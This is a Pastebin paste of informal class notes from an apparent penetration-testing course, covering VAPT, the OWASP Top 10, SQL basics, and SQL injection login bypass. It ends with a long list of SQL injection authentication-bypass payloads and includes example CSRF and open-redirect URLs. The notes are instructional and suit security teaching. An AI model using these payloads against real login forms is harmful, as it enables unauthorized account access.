API tools faq
paste
Advertisement
Guest User

session 9

a guest
Apr 26th, 2019
102
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.25 KB | None | 0 0
raw download clone embed print report
  1. VAPT
  2. Vulnerabitinglity Assessment Penetration Testing
  3. VAPT EXPERT = Vulnerability Assessment and Penetration Testing expert,
  4.  
  5. so VULNERABILITY ASSESSMENT is a pre-hacking phase in which the intended person scans and tries to find out the security gaps or holes that make the device or software vulnerable
  6.  
  7. Example
  8. ip address -> 192.168.1.55
  9. open ports(ports on which some application may be listening)
  10. Filtered ports-(Firewall protected)
  11. os information -is it upto date?
  12. Service running on ports
  13.  
  14.  
  15. PENETRATION TESTING is a phase in which the intended person actually tests out the systems by simulating attacks on the systems
  16.  
  17. Penetration testing is a method of evaluating the security of a computer system or network by simulating an attack like a malicious hacker.The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and involves active exploitation of security vulnerabilities.
  18.  
  19. Example using Exploits for known vulnerability
  20.  
  21. ->windows 7 Server
  22.  
  23. ->Using exploit to exploit the server
  24.  
  25. AT the end a proof of concept is need to be made a handed to Senior Authority
  26.  
  27. Example
  28. Big banks or smart car manufacturers hire security professionals to hack into their systems ethically and they pay large sums of money to them to do that in the end of VAPT a Vapt report needs to be handed to the bank's security team
  29.  
  30.  
  31. __________________________________________________
  32.  
  33.  
  34.  
  35. Owasp ->Open Web Application Security Project
  36.  
  37. Owasp top 10
  38.  
  39. 1. Injection
  40. 2. Broken Authentication and Session Management
  41. 3. Cross Site Scripting(XSS)
  42. 4. Insecure Direct Object Reference
  43. 5. Security Misconfiguration
  44. 6. Sensitive Data Exposure
  45. 7. Missing Function Level Access Control
  46. 8. Cross site request forgery
  47. 9. Using Known Vulnerable Components
  48. 10.Unvalidated Redirects and Forwards
  49.  
  50.  
  51.  
  52. 1. Injection Vulnerabilities--> Sql,Commands
  53.  
  54. Injection Attack occurs only if hacker's are able to send malicious unintended data from an application to the interpreter or say backend of the website .
  55.  
  56. application->untrusted data->interpreter(backend)
  57.  
  58. why this attacks occurs ->>
  59. This attack occurs because of improper validation-> for e.g lets take the example of a signin or signup field on a computer web application ,now when a user is trying to sign-in or sign-up
  60. it requires user to enter id/password in a certain manner, like there should be no special characters involved etc, You will learn about that as regular expressions
  61.  
  62. Similarly when a developer is setting up a webapp/or application he/she need to validate all the parameter,link and domains of the website so that commands or special character dont work.
  63. __________________________________________________________________
  64. 2. Broken Authentication and Session Management
  65.  
  66. In broken authentication or session management hackers make an attempt to steal account from another users, Attackers/hacker uses leaks and flaws in the authentication or session management Functions.
  67.  
  68. Why this attack occurs....
  69.  
  70. ->User credentials are not protected when stored using hashing or encryption
  71. -
  72. >Credentials can be guessed or overwritten through weak management functions eg(Hacker is able to guess session id , or change password)
  73.  
  74. ->Session id's are exposed in the url
  75. ->Session id's don't time out
  76. ______________________________________________________________________
  77.  
  78. 3. Cross Site Scripting (XSS)
  79.  
  80. It is an attack in which hackers are able to execute javascript code on a web site, It is of three types
  81.  
  82. ->XSS Reflected
  83.  
  84. ->XSS Stored
  85.  
  86. ->Dom XSS
  87.  
  88. This attack can be used by hacker to execute javascript code in victim browser to hijack user sessions, deface website, insert content, etc
  89.  
  90. Why this attack occurs
  91.  
  92. ->Improper Validation
  93. ->Unsafe JavaScript API
  94.  
  95. The pentesting of a website can easily protect form xss attacks and xss can also be found with simple code analysis.
  96. _______________________________________________________________________________
  97.  
  98. 4. Insecure Direct Object Reference
  99.  
  100.  
  101. It is a vulnerability in which an attacker who is authorised to his/her own dash board is able to gain access to some other users account by changing his/her own object reference assigned by the app.
  102.  
  103. study tonight
  104.  
  105. 5.Security Misconfiguration
  106.  
  107. As the name is security misconfiguration what it means is imagine a webapp having admin accounts on it or just having default accounts with default passwords but having certain privleges . Now if you run a website which has default accounts configured and your website is available in the public domain. Now from an attackers perspective he/she can actually go out and try out default credentials and would be able to log in the website.
  108.  
  109. why this attack occurs->
  110.  
  111. ->Keeping default credentials
  112. ->Using a component or plugin which may have some default credentials
  113. e.g
  114. ->>>>>>>>>>>Directory listing is not disabled on your server.
  115.  
  116. Attacker discovers she can simply list directories to find any
  117. file. Attacker finds and downloads all your compiled Java
  118. classes, which she decompiles and reverse engineers to get all
  119. your custom code. She then finds a serious access control
  120. flaw in your application
  121. _______________________________________________________________________
  122.  
  123. 6.Sensitive Data Exposure
  124. Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion or at rest or even at customer/users browser
  125.  
  126.  
  127. eg 1
  128. An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.
  129.  
  130. eg 2
  131. A site simply doesn’t use SSL for all authenticated pages. Attacker simply monitors network
  132. traffic (like an open wireless network), and steals the user’s session cookie. Attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.
  133.  
  134.  
  135. _____________________________________________________________________________
  136. 7. Missing Function Level Access Control
  137. ->It is an attack in which a hacker or an anonymous person is able able to access an application interface that it would otherwise never been able to access.
  138.  
  139. eg www.anywebsite.com/user
  140.  
  141. and hacker is able to access www.anywebsite.com/admin
  142. now if a hacker /person is able to do that it is a flaw.
  143. ____________________________________________________________
  144.  
  145. 8. Cross site request Forgery.
  146. In this attack the hacker creates a forged http request and tricks victim into submitting that request via images tabs or xss
  147.  
  148.  
  149.  
  150. The application allows a user to submit a state changing request that does not include anything secret.
  151. For example:
  152. http://anywebsite.com/app/transferFunds?amount=1500&destinationAccount=4673243243
  153. this all done by making the victim click on a link or on a certain appealing image
  154. _______________________________________________________________
  155.  
  156.  
  157.  
  158. 9. Using Components with Known Vulnerability
  159. In this case hacker tries to discover a weak component through scanning or manual analysis and then either finds out an exploit if already available or writes an exploit
  160.  
  161. eg
  162. a website using a server which has an rce exploit
  163. or
  164. a wordpress website which has a vulnerable component and has an exploit.
  165. ___________________________________________________________________________________
  166.  
  167. 10.Unvalidated Redirects and Forwards
  168. Attacker links to unvalidated redirects and tricks victim into clicking it,attacker targets unsafe forwards to bypass security check.
  169.  
  170. eg http://anywebsite.com/redirect.jsp?url=evil.com
  171.  
  172. ->->url=evil.com<-<-
  173.  
  174. ______________________________________________________________________________________
  175. Introduction to DBMS
  176. Database
  177.  
  178. Database is a collection of structured data set which contains all the data(important credentials,logs,etc)
  179. Database Management system-This data needs to be managed and it is done with help of dbms ,Dbms can also interact with user and writes user data to database.
  180.  
  181. Database can be of two types
  182. SQL
  183. No SQL
  184. There are certain tables and entries in a database
  185.  
  186. table name Member
  187. _________________________________________________________
  188. Name | ID | NUMBER | EMAIL | ADDRESS | Age |
  189. _________________________________________________________
  190. deepak|10|9123456719|deepak@yahoo.co.in|lokhandvala|26 |
  191. Gagan |4 |9145619237|gagan@gmail.com |Delhi |20 |
  192. _________________________________________________________
  193.  
  194.  
  195. Structured querries would look like
  196. for example
  197. all the people who have age less then 30
  198. so query would look like
  199.  
  200. Select * from Member where age<30
  201.  
  202.  
  203. h.w perform all querries
  204. queries
  205. SELECT - extracts data from a database
  206. = UPDATE - updates data in a database
  207. = DELETE - deletes data from a database
  208. = INSERT INTO - inserts new data into a database
  209. = CREATE DATABASE - creates a new database
  210. = ALTER DATABASE - modifies a database
  211. = CREATE TABLE - creates a new table
  212. = ALTER TABLE - modifies a table
  213. = DROP TABLE - deletes a table
  214. = SELECT * from trainees - Select everything from table name "trainees"
  215. = WHERE - Showing the location of the data of the table,column etc.
  216.  
  217. H.w Study Mongodb
  218. sql VS noSql
  219.  
  220. _________________________________
  221. LVS Setup configuration Practical
  222. _________________________________
  223.  
  224. ______________________________________________
  225. Sql Injection Authentication Bypass
  226.  
  227. at the time of authentication ho kya rha hen
  228. Lets Imagine
  229. koi querry hogi -> username== 'Something' && password=='Something'
  230.  
  231. if ham querry ko true karwade kisi Tareeke se and dbms confuse hojay to kya vo hame login dega??
  232.  
  233. for eg username = 1' or '1' = '1
  234. password = 1' or '1' = '1
  235.  
  236. or hum kya try kar sakte hen
  237. 0' or '0' = '0
  238. 2' or '2' = '2
  239. or
  240. 0' or '3' = '3
  241.  
  242. so basically you just need to manage to make querry true and if there is improper validation you can get access
  243.  
  244.  
  245.  
  246.  
  247.  
  248.  
  249. usernmamev =hello
  250. password = hello1
  251. \
  252. login
  253.  
  254.  
  255.  
  256. 1' or '1' = '1
  257. 1' or '1' = '1
  258.  
  259. asljhdaksd??where some where username='1' or '1' = '1' & password ='1' or '1' = '1'lajbnd,fsnfkns.d
  260.  
  261.  
  262.  
  263.  
  264.  
  265.  
  266.  
  267. 1' or '1' = '1
  268. ___________________________________________
  269. or 1=1
  270. or 1=1--
  271. or 1=1#
  272. or 1=1/*
  273. admin' --
  274. admin' #
  275. admin'/*
  276. admin' or '1'='1
  277. admin' or '1'='1'--
  278. admin' or '1'='1'#
  279. admin' or '1'='1'/*
  280. admin'or 1=1 or ''='
  281. admin' or 1=1
  282. admin' or 1=1--
  283. admin' or 1=1#
  284. admin' or 1=1/*
  285. admin') or ('1'='1
  286. admin') or ('1'='1'--
  287. admin') or ('1'='1'#
  288. admin') or ('1'='1'/*
  289. admin') or '1'='1
  290. admin') or '1'='1'--
  291. admin') or '1'='1'#
  292. admin') or '1'='1'/*
  293. 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
  294. admin" --
  295. admin" #
  296. admin"/*
  297. admin" or "1"="1
  298. admin" or "1"="1"--
  299. admin" or "1"="1"#
  300. admin" or "1"="1"/*
  301. admin"or 1=1 or ""="
  302. admin" or 1=1
  303. admin" or 1=1--
  304. admin" or 1=1#
  305. admin" or 1=1/*
  306. admin") or ("1"="1
  307. admin") or ("1"="1"--
  308. admin") or ("1"="1"#
  309. admin") or ("1"="1"/*
  310. admin") or "1"="1
  311. admin") or "1"="1"--
  312. admin") or "1"="1"#
  313. admin") or "1"="1"/*
  314. 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!